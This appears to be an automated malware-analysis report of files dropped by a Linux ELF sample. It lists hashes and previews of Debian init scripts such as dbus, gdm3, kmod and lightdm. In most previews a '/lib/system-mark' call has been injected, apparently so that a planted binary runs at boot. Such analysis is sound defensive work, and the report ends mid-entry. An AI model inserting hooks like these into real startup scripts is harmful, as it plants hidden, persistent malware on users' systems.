                                                                                                  SSDEEP:48:7mU3mK7xpvyCKyhfPV5upSYf54v6YSBFQJvFS2b:7j3FpjhnV5upSYuv3ScJQ2b
                                                                                                  MD5:B6B52BC4EBC4D496D01B30E2CFCF2C62
                                                                                                  SHA1:0221F156258ED821216CBF81280EE6324BDD52E9
                                                                                                  SHA-256:62B6CC632C9AC071EF72CDEB7057A4B20B7AE17413A289AEC43A67162B20A989
                                                                                                  SHA-512:B6FD6007E039984D1E505A62C76BB3373F3AF4A4DCB7E1AB7E2DF5C66D9D2F87DEB3DE2DEE97DF8FC33E9F94975B64DF03049C4DF60A1F02FADF4D5A7F6D4ED8
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cups-browsed.# Required-Start: $syslog $remote_fs $network $named $time.# Required-Stop: $syslog $remote_fs $network $named $time.# Should-Start: avahi-daemon.# Should-Stop: avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: cups-browsed - Make remote CUPS printers available locally.# Description: This daemon browses Bonjour broadcasts of shared remote CUPS.# printers and makes these printers available locally by creating.# local CUPS queues pointing to the remote queues. This replaces.# the CUPS browsing which was dropped in CUPS 1.6.1. For the end.# the behavior is the same as with the old CUPS broadcasting/.# browsing, but in the background the standard method for network.# service announcement and discovery, Bonjour, is used..### END INIT INFO..DAEMON=/usr/sbin/cups-browsed.NAME=cups-browsed.PIDFIL
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, Unicode text, UTF-8 text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3255
                                                                                                  Entropy (8bit):5.118926067111819
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:9JOxbyAn/JNsQmx+xZRGWoGUuK2gY5W7zTXmgI:9Jw2U1MSIr7nXmL
                                                                                                  MD5:B05B34CA2A32E2007677F6CD40C3AF66
                                                                                                  SHA1:48F6C6EC5AE325D1E72224E27E98DE1CF817C521
                                                                                                  SHA-256:6C0251B0D84D116413A6DEF3B4D1699017BE1114E025B5E7E4B546237209574E
                                                                                                  SHA-512:692CE95159E6677954A6E573ADCDC5BFF11301E37CF25501F7205164CC2F4D24B6758663BE5ABD680EEC2E22C08AA491CEC269DDB696AC2D4EF99798CBC30495
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: dbus.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: D-Bus systemwide message bus.# Description: D-Bus is a simple interprocess messaging system, used.# for sending messages between applications..### END INIT INFO.# -*- coding: utf-8 -*-.# Debian init.d script for D-BUS.# Copyright . 2003 Colin Walters <walters@debian.org>.# Copyright . 2005 Sjoerd Simons <sjoerd@debian.org>..set -e..DAEMON=/usr/bin/dbus-daemon.UUIDGEN=/usr/bin/dbus-uuidgen.UUIDGEN_OPTS=--ensure.NAME=dbus.DAEMONUSER=messagebus.PIDDIR=/var/run/dbus.PIDFILE=$PIDDIR/pid.DESC="system message bus"..test -x $DAEMON || exit 0... /lib/lsb/init-functions..# Source defaults file; edit that file to configure this script..PARAMS="".if [ -e /etc/default/dbus ]; then./lib/system-mark. . /etc/default/dbus.fi..create_machineid() {. # Create machine-id file. i
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3102
                                                                                                  Entropy (8bit):5.042976496573067
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:78unF1gLpxNlduwTebFGBzB4ndfPaMa59zqKN/UsCVADsZvOsFzmxOsFC2WtFji:7dnM1XV3B2dUdaVAGvoe2Wtc
                                                                                                  MD5:34C249DFA3336DB31FBE66E1CD5758F6
                                                                                                  SHA1:4B86122506102F1A88F72FF6D83C8E32B88F9D1E
                                                                                                  SHA-256:EE131550054FD4C8053F1C139C7F96CDBA8FD3F7CCFA78C1ED87DDD4FFC10D47
                                                                                                  SHA-512:B88FE306642B0757B24110D43BFF4A286D24C1995C0E6C3E9429E85E51D9D9DD4150BB4F99F818EDBC3CF2AFB2F9CE30CB1E7928B15CF8D41ADC330D3F0C58F3
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: gdm3.# Should-Start: console-screen dbus network-manager.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: GNOME Display Manager.# Description: Debian init script for the GNOME Display Manager.### END INIT INFO.#.# Author: Ryan Murray <rmurray@debian.org>.#.set -e..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/gdm3.PIDFILE=/var/run/gdm3.pid..test -x $DAEMON || exit 0..if [ -r /etc/default/locale ]; then./lib/system-mark. . /etc/default/locale. export LANG LANGUAGE.fi... /lib/lsb/init-functions..# To start gdm even if it is not the default display manager, change.# HEED_DEFAULT_DISPLAY_MANAGER to "false.".HEED_DEFAULT_DISPLAY_MANAGER=true.DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager..activate_logind() {. # Try to dbus activate logind to avoid a race conditions if we are not. # runnin
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3163
                                                                                                  Entropy (8bit):5.259424339682965
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:ietQlU+vdYb5tM7yL7yi47yIrrF9o6YRK50JDRABzNJuhCv8Z//UZJ7iuh052m3s:FtQlTd65tp6iN0oLRsQaAsUkho2mc
                                                                                                  MD5:78C631FF42D0225229009886F9999B56
                                                                                                  SHA1:4FAEF5CD07FC43C3AE00A1D09116580664EB9158
                                                                                                  SHA-256:0EA1C7D35BA69FB47D9AF56AA7FEEA00CC2F0A0F1ACB5796C48D4BB95F980D9E
                                                                                                  SHA-512:DF5DE7A268F0FFB5C6E95A32128877AAB05EA46331471D95E97DD4A31B883D0B9DE9005EC995F37AA254BEFE27A252961FF37148BB3E7896E30373FC16F96D84
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.#.# skeleton example file to build /etc/init.d/ scripts..# This file should be used to construct scripts for /etc/init.d..#.# Written by Miquel van Smoorenburg <miquels@cistron.nl>..# Modified for Debian GNU/Linux.# by Ian Murdock <imurdock@gnu.ai.mit.edu>..#.# Version: @(#)skeleton 1.8 03-Mar-1998 miquels@cistron.nl.#..### BEGIN INIT INFO.# Provides: hddtemp.# Required-Start: $remote_fs $syslog $network.# Required-Stop: $remote_fs $syslog $network.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: disk temperature monitoring daemon.# Description: hddtemp is a disk temperature monitoring daemon.### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=hddtemp.DAEMON=/usr/sbin/$NAME.DESC="disk temperature monitoring daemon"..DISKS="/dev/hd[a-z] /dev/hd[a-z][a-z]".DISKS="$DISKS /dev/sd[a-z] /dev/sd[a-z][a-z]".DISKS="$DISKS
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3946
                                                                                                  Entropy (8bit):5.1522498878727045
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:uYqy3be4txLsMwqTZL5FFTUaTfNvagXQwjdjNvaYXDkeQz:VZbxtXFZNZTfNvawxjNva4e
                                                                                                  MD5:40E4F04E723FB5BEE6DF2327EA35254D
                                                                                                  SHA1:D512EAB734F222022E210CCA19128E992691CF78
                                                                                                  SHA-256:EEC4726C42AA93DEB9D6228BD464ED33FB6C1FF6FFD88ECC14C603746A7C444A
                                                                                                  SHA-512:71D245EA40A64FDCCAAA88D869F8E929F5FA9736FB16D7079CE41184CA9DA71F40E2E6EFED8382C4350089932AAC8C588271F72FB9E5139E35FF504C65127227
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.# hwclock.sh.Set and adjust the CMOS clock..#.# Version:.@(#)hwclock.sh 2.00 14-Dec-1998 miquels@cistron.nl.#.# Patches:.#..2000-01-30 Henrique M. Holschuh <hmh@rcm.org.br>.#.. - Minor cosmetic changes in an attempt to help new.#.. users notice something IS changing their clocks.#.. during startup/shutdown..#.. - Added comments to alert users of hwclock issues.#.. and discourage tampering without proper doc reading..# 2012-02-16 Roger Leigh <rleigh@debian.org>.# - Use the UTC/LOCAL setting in /etc/adjtime rather than.# the UTC setting in /etc/default/rcS. Additionally.# source /etc/default/hwclock to permit configuration...### BEGIN INIT INFO.# Provides: hwclock.# Required-Start: mountdevsubfs.# Required-Stop: mountdevsubfs.# Should-Stop: umountfs.# Default-Start: S.# X-Start-Before: checkroot.# Default-Stop: 0 6.# Short-Description: Sync hardware and system clock time..
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2707
                                                                                                  Entropy (8bit):4.995870971917478
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:92ZPnWGmH6TMV5m11QU7BXCW3gxxsXuHtpyBMbtKxxsDKV/BkH5:92Z/WbZnm11LByWwxKXuHtcBMbtKxKDr
                                                                                                  MD5:E666B216857A200A89A8C38279974070
                                                                                                  SHA1:5184B1942742E7D4811A8BA0080BD19413306EB5
                                                                                                  SHA-256:3A9EF64FD98E3991ABEE18FE69ED507EE8516B5777E7B3E8BB3BC69AE997D1F8
                                                                                                  SHA-512:A2BC047C6034F8594B640DD5A7746AAD3F6BEAC9239AA71C00C90EB19FF37FAD38B08A5ACC0B8E1928CC447450C0A69E3FB4C8A6EF65EC584227F0E8ACF1F3D2
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: irqbalance.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: daemon to balance interrupts for SMP systems.### END INIT INFO.# irqbalance init script.# August 2003.# Eric Dorland..# Based on spamassassin init script..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/irqbalance.NAME=irqbalance.SNAME=irqbalance.DESC="SMP IRQ Balancer".PIDFILE="/run/$NAME.pid".PNAME="irqbalance".DOPTIONS=""..# Defaults - don't touch, edit /etc/default/.OPTIONS=""..test -x $DAEMON || exit 0... /lib/lsb/init-functions..test -f /etc/default/irqbalance && . /etc/default/irqbalance..# Beware: irqbalance tries to read and handle environment variables.# directly itself, but since start-stop-daemon clears the env.# we convert the variables to commandline arguments here....# (Note: in the daemon an option is enabled even if its set to.# e.g. the empty strin
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1555
                                                                                                  Entropy (8bit):4.972539518025109
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:2Ex/YpMr8MICUV7OlfrDNhay+HNCNIlH3U8lrQ5l8u4uuCG:/puMAMICu7OlN+UIlH3U8lc/ZWCG
                                                                                                  MD5:ECC4B12F805560CED916AF27BF8423D1
                                                                                                  SHA1:A5954BF38D2E34AE23286D676FE6E4153CDBFF69
                                                                                                  SHA-256:C33D4A5025DB90ACA69F23F041F2AFB4B31F1016DF03631C6D918A4EF5E6842D
                                                                                                  SHA-512:CFAC2CC9451D012F8A4DACFFC6ACA4C9456FF4F0D212C419443C0939CEB0AFE1DAE59329D9F9D27413A9E6CF2E0D05775C873AE53C355C0A8A738DB07120CAD3
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: iscsid.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: iSCSI initiator daemon (iscsid).# Description: The iSCSI initiator daemon takes care of.# monitoring iSCSI connections to targets. It is.# also the daemon providing the interface for the.# iscisadm tool to talk to when administering iSCSI.# connections..### END INIT INFO..# Author: Christian Seiler <christian@iwakd.de>..DESC="iSCSI initiator daemon".DAEMON=/sbin/iscsid.PIDFILE=/run/iscsid.pid.OMITDIR=/run/sendsigs.omit.d..do_start_prepare() {..if ! /lib/open-iscsi/startup-chec
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1548
                                                                                                  Entropy (8bit):4.309956240738216
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:9XfgD1yQyKzYcg/LshTJckS5MJAb8kGh5A9b6:9YQLH/w5SO
                                                                                                  MD5:89A7217DCF2B72ACC044B81A9CC3FC6F
                                                                                                  SHA1:E4E5E503268D650B4F0FE7C37DC0BD3EFA1CABC6
                                                                                                  SHA-256:896A6EAFC64047CB19D6319915BD349FD3B90A8BECA8A83AB2153EEC519A59E5
                                                                                                  SHA-512:8E6B76171B23133C44AB7CF19DCCCE87FD0AA38F4BC0520AB6F2AFA64CA506D447C192F0B09A8584D9C2203F665E89D8D33B3EA30E53681F5BA62A1DABC1DBC6
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: keyboard-setup.sh.# Required-Start: mountkernfs.# Required-Stop:.# X-Start-Before: checkroot.# Default-Start: S.# Default-Stop:.# X-Interactive: true.# Short-Description: Set the console keyboard layout.# Description: Set the console keyboard as early as possible.# so during the file systems checks the administrator.# can interact. At this stage of the boot process.# only the ASCII symbols are supported..### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system-mark. case "$1" in. stop|status). # console-setup isn't a daemon. ;;. start|force-reload|restart|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system-mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {..
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2164
                                                                                                  Entropy (8bit):4.907145181173842
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:+mUxLADBzBQYDMAKjqg3Ulfb4MZC/tCYJGMsMHwDa1kig/ue5NrGgbcl8d:l/dtQYxKjRQfbO/oYJbJQAki6jzz
                                                                                                  MD5:0B192EEF5B7E6AE9C89B8E127943E04C
                                                                                                  SHA1:6F6B5F63D1F504524C5C27849353255A6EDEA52E
                                                                                                  SHA-256:D43E4D15B82D9D85BEF6B2B676506AED1B7FC3C50232BFB7BFE1D0202C83DCA3
                                                                                                  SHA-512:860ACA2D19758EAA6FD8C3D0552674842916C4F853A6739932A9E66B68582E5359AD91EE4F27443992ACCA380BFC33C2178BCAA21B93A812916CB228B831BA82
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh -e.### BEGIN INIT INFO.# Provides: kmod.# Required-Start: .# Required-Stop: .# Should-Start: checkroot.# Should-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: Load the modules listed in /etc/modules..# Description: Load the modules listed in /etc/modules..### END INIT INFO..# Silently exit if the kernel does not support modules..[ -f /proc/modules ] || exit 0.[ -x /sbin/modprobe ] || exit 0..[ -f /etc/default/rcS ] && . /etc/default/rcS.. /lib/lsb/init-functions..PATH='/sbin:/bin'..case "$1" in. start). ;;.. stop|restart|reload|force-reload). log_warning_msg "Action '$1' is meaningless for this init script". exit 0. ;;.. *). log_success_msg "Usage: $0 start". exit 1.esac..load_module() {. local module args. module="$1". args="$2".. if [ "$VERBOSE" != no ]; then./lib/system-mark. log_action_msg "Loading kernel module $module". modprobe $module $args || true. else. modprobe $module $args > /dev/null 2>&1 || t
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3534
                                                                                                  Entropy (8bit):5.282612583353571
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:fbmo8vyUjH3J+cNrWId4KF9wDeXxr/FI/F7R7cJ0IB6rd/g1ZsbHaXAZ4td/WzvA:d8z3J+cNiR4SzGmJHyRDuHTWld
                                                                                                  MD5:E6E338C277324717A5722E4EA56AA2EE
                                                                                                  SHA1:46334BCB354D10D0AAC47F4D542710B66D446A77
                                                                                                  SHA-256:5BF68D24F74EC03AE3E2D53B8F57E51C8C3CB320FE53E5D6C8F3214E25EE9C29
                                                                                                  SHA-512:19AF2485DB58640CFEA8E245A4E1E57624239C12B961C7218B5B50FB880985D4275862F0F8FA805D004314844B791E8F2FE248A7797FF4D5082A892E34126DE9
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh..# Largely adapted from xdm's init script:.# Copyright 1998-2002, 2004, 2005 Branden Robinson <branden@debian.org>..# Copyright 2006 Eugene Konev <ejka@imfi.kspu.ru>.#.# This is free software; you may redistribute it and/or modify.# it under the terms of the GNU General Public License as.# published by the Free Software Foundation; either version 2,.# or (at your option) any later version..#.# This is distributed in the hope that it will be useful, but.# WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License with.# the Debian operating system, in /usr/share/common-licenses/GPL; if.# not, write to the Free Software Foundation, Inc., 51 Franklin Street, .# Fifth Floor, Boston, MA 02110-1301, USA...### BEGIN INIT INFO.# Provides: lightdm.# Required-Start: $local_fs $remote_fs dbus.# R
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):901
                                                                                                  Entropy (8bit):5.1022129052660485
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:1CpBMHQHf7Wc9rlVYhRwDyh0QvsFoiXmH0+QhKDydO6aock1j6yLRujvljn:1i4WyM/IwfJ2Hjq13O
                                                                                                  MD5:46FB137F6F75999F794FDB149BCAD53B
                                                                                                  SHA1:90F88FB0972A25A2BBEA62DB26EA84ED9CFC036D
                                                                                                  SHA-256:D661181FDD70CE80EF52393D7A58D33009CAE7ED2EB62C764C4CAC0181DD7E76
                                                                                                  SHA-512:C360EB8E5FD3E7A7740D6AE395DB430811306C176C9E3FEA975E76B6474533A30F709155A81F007E29DC61AE2200445CCD79F08139998BA575115F7CE45340CC
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh..### BEGIN INIT INFO.# Provides: lm-sensors.# Required-Start: $remote_fs.# Required-Stop:.# Default-Start: S.# Default-Stop:.# Short-Description: lm-sensors.# Description: hardware health monitoring.### END INIT INFO... /lib/lsb/init-functions..[ -f /etc/default/rcS ] && . /etc/default/rcS.PATH=/bin:/usr/bin:/sbin:/usr/sbin.PROGRAM=/usr/bin/sensors..test -x $PROGRAM || exit 0..case "$1" in. start)..log_action_begin_msg "Setting sensors limits"..if [ "$VERBOSE" = "no" ]; then./lib/system-mark.../usr/bin/sensors -s 1> /dev/null 2> /dev/null.../usr/bin/sensors 1> /dev/null 2> /dev/null..else.../usr/bin/sensors -s.../usr/bin/sensors > /dev/null..fi..log_action_end_msg 0..;;. stop)..;;. force-reload|restart)..$0 start..;;. status)..exit 0..;;. *)..log_success_msg "Usage: /etc/init.d/lm-sensors {start|stop|restart|force-reload|status}"..exit 1.esac..exit 0..
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):604
                                                                                                  Entropy (8bit):5.314197695143652
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:wdRDNeBuYrBMmCU33VLBa5kI5GKq9XquaZ+w2Cj/:2Ex/lti9OXylj/
                                                                                                  MD5:273FB590FE7F5DAE000DC871BC5418DB
                                                                                                  SHA1:90575E32A398270FC2D10448A454646B84F3B257
                                                                                                  SHA-256:D9EDBDDD0D0151FDC741B4C0B8F6910DC01D9A6F2F2CBE5705297E4B27EE9C0F
                                                                                                  SHA-512:62B1896678941476EF1DF756AC16B136F0FDB1E86A53A8DC17340BDF03504BC7C54A8E04807B692A9F15A7904CE6E0087D3F6373C2CF1F6807444B36E45ABDCB
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system-mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: lvm2-lvmpolld.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: LVM2 poll daemon.### END INIT INFO..DESC="LVM2 poll daemon".DAEMON=/sbin/lvmpolld.DAEMON_ARGS="-t 60".PIDFILE=/run/lvmpolld.pid..do_start_prepare() {. mkdir -m 0700 -p /run/lvm.}..
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2518
                                                                                                  Entropy (8bit):5.325203715837751
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:7HvaUX9Q3esRt33P4AWNr/42Fwk0qmA40O4pTjmCjVwUH:7PaUX0eSt3/VczgWBbjmCjVwS
                                                                                                  MD5:0DBC33D8B96CA2A841D1A83960BDF389
                                                                                                  SHA1:BDC86C7897C467A42075B2C80A1CAEDCCA794F76
                                                                                                  SHA-256:631AD4D36C691EBC1AADD6006C597B64A69F4AF1F6AA2455A8F4F2563F11F13D
                                                                                                  SHA-512:F6320E3BD73BC5AFFD6C3D13832F836CE81323C0A059D26C9294A65C3DA7B3A394BC5A20C6B07244F48499BB5B8E3A7869A7E48FAF916CEABC495B8D281BDB8F
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: mono-xsp4.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Should-Start: .# Should-Stop:.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Mono XSP4.# Description: Debian init script for Mono XSP4..### END INIT INFO.#.# Written by Pablo Fischer <pablo@pablo.com.mx>.# Dylan R. E. Moonfire <debian@mfgames.com>.# Modified for Debian GNU/Linux.#.# Version:.@(#)mono-xsp4 pablo@pablo.com.mx.#..# Variables.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/bin/xsp4.NAME=mono-xsp4.DESC="XSP 4.0 WebServer".DEFAULT=/etc/default/$NAME.CFGDIR=/etc/xsp4.VIRTUALFILE=$CFGDIR/debian.webapp.MONO_SHARED_DIR=/var/run/$NAME.start_boot=false..# Use LSB.. /lib/lsb/init-functions..# If we don't have the basics, don't bother.test -x $DAEMON || exit 0.test -f $DEFAULT && . $DEFAULT...if [ "x$start_boot" != "xtrue" ] ; then./lib/system-mark. exit 0.fi..if [ ! -e $MO
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2964
                                                                                                  Entropy (8bit):5.31314714541473
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:7HUksR9JrtNCDCJ99TaPn1PCDCJ99TafOBUV1kqH2fQuzfg61U149eh7KKSKMs:7HUkwbrSDu+Pn1qDu+2qV1RHSQuzA4I5
                                                                                                  MD5:54E61FBA1E794A3A95B4FA31099CEB2F
                                                                                                  SHA1:4036B83019BAE7A2D843C13C52AA91A86C4D4CA4
                                                                                                  SHA-256:BAEC2D4F6968AE735457DE716EB7E880C03C410A53A1C19563C258D78852874E
                                                                                                  SHA-512:6AC88EF6CDE8A2D98ED14A879CEDD04B263F252C0A03E93FBF5F6B50AF5416BDD3BAC231E43C98BA5DF0043703D67F1852D9159672B43D5D5EC0EC61BA431688
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: multipath-tools.# Required-Start: udev $local_fs $remote_fs $syslog.# Required-Stop: udev $local_fs $remote_fs $syslog.# Should-Start: iscsi.# Should-Stop: iscsi.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: multipath daemon.# Description:.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin/:/usr/bin.DAEMON=/sbin/multipathd.NAME=multipathd.DESC="multipath daemon".syspath=/sys/block..test -x $DAEMON || exit 0... /lib/lsb/init-functions..if [ -f /etc/default/multipath-tools ] ; then./lib/system-mark... /etc/default/multipath-tools.fi..teardown_slaves().{.cd $1; .if [ -d "slaves" ]; then./lib/system-mark.for slave in slaves/*;.do..if [ "$slave" = "slaves/*" ]; then./lib/system-mark...read dev < $1/dev...tablename=$(dmsetup table --target multipath | sed -n "s/\(.*\): .* $dev .*/\1/p")...if ! [ -z $tablename ]; then./lib/system-mark....log_daemon_msg "Root is on a multipathed device, multipathd c
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2589
                                                                                                  Entropy (8bit):5.112756814918559
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:7UMRMrEm3cy8Nc8NgZlfMMtWBAl3ATeTPAdWIlRdWdtRMg02AC9ArANTcAhicF:7b2rH338azZlfn/lwA4dWIhC8DUbL
                                                                                                  MD5:207481F279E4D4E87E2455C16287C685
                                                                                                  SHA1:1CC3B8B32EE2BCD5342F38B66C936C4EC18897F4
                                                                                                  SHA-256:225B755072D5C433DE74DE26633834FF05A6956053557F1B3F634AE08752C6BF
                                                                                                  SHA-512:E494C2A33928070E2E1BACA3AE53814986AC7C9CEB3B4D31CAE0C0202AC2BEE98CF65A196387FAA7EED560B6AC6665EE6D3C77630167ADFDBF82C99FE3F65B14
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: open-iscsi iscsi.# Required-Start: $network $local_fs iscsid.# Required-Stop: $network $local_fs iscsid sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Login to default iSCSI targets.# Description: Login to default iSCSI targets at boot and log out.# of all iSCSI targets at shutdown..### END INIT INFO..PATH=/sbin:/bin.DAEMON=/sbin/iscsid.ADM=/sbin/iscsiadm.PIDFILE=/run/iscsid.pid.NAMEFILE=/etc/iscsi/initiatorname.iscsi.CONFIGFILE=/etc/iscsi/iscsid.conf.OMITDIR=/run/sendsigs.omit.d..[ -x "$DAEMON" ] || exit 0... /lib/lsb/init-functions..# Include defaults if available.if [ -f /etc/default/open-iscsi ]; then./lib/system-mark... /etc/default/open-iscsi.fi...if [ ! -d /sys/class/ ]; then./lib/system-mark. log_failure_msg "iSCSI requires a mounted sysfs, not started.". exit 0.fi..RETVAL=0..start() {..if ! [ -s $PIDFILE ] || ! kill -0 `sed -n 1p $PIDFILE` >/dev/null ; then./l
                                                                                                  Process:/tmp/linux_aarch64.elf
                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1881
                                                                                                  Entropy (8bit):4.863837327437562
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:1a/f0aOHh86/X/QA4pWh8FgM8QhmMl8FkgPooG2DKYUP:1a/f0aOB86j4e8j8Q8Ml8OmooG2D3k
                                                                                                  MD5:CE0C8A7E1042C39FB28FEE6981E2ACE4
                                                                                                  SHA1:C7B193DB855B637F7011A28928DE2E0A5796B825
                                                                                                  SHA-256:32735889841F4B203B9C06278D9A178D08AF5288474F475A31F0AC2669C1DD56
                                                                                                  SHA-512:1B676B9B1CB75C48D5B4EE6D34E402A6B99C4CECA8B261177396C13E63323A5C6A9F62B556FFAB110C25B9066D4253E9C0ACB1D3DA790ECD70426DD9A0AA46C1
                                                                                                  Malicious:true
                                                                                                  Antivirus:
